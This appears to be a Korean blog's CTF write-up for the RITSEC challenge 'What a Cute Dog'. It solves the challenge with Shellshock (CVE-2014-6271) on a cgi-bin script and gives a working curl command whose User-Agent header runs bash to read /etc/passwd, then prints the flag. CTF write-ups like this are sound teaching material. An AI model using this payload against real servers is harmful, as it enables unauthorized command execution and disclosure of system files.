Dyrandy
[RITCTF] What a Cute Dog 350 (Shell Shock, CVE 2014-6271) 본문
솔직히 250점 짜리보다는 쉬운것 같은데
이게 왜 웹인지는 크흠....
일단 소스코드를 보면
cgi-bin을 사용하는 것을 알 수 있다.
페이지에 접속을 해보면 위와 같이 뜬다.
나는 shell shock은 아닐줄 알았는데...
일단 검색을 해보면 위와 같이 나온다.
https://github.com/hmlio/vaas-cve-2014-6271
위 페이지를 참고하면
아래와 같이 나온다. 해서
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://fun.ritsec.club:8008/cgi-bin/stats
위를 이용하면
나온다
stats에는 아무것도 없다.....
flag를 찾아보면 숨겨 놨다.....
RITSEC{sh3ll_sh0cked_w0wz3rs}
'CTF WriteUp' 카테고리의 다른 글
| 친구와 둘이서 한 CTF (0) | 2018.11.29 |
|---|---|
| [RITCTF] Lazy Dev 400 (php://input) (0) | 2018.11.20 |
| [RITCTF] Crazy Train 250 (SSTI vuln 취약점) (0) | 2018.11.20 |
| [MEEPWN] CTF 2018 - OMEGASECTOR (webshell) (0) | 2018.08.03 |
| [H3X0R 2018] Web - Geek Test (0) | 2018.06.18 |
'CTF WriteUp' Related Articles
more
Comments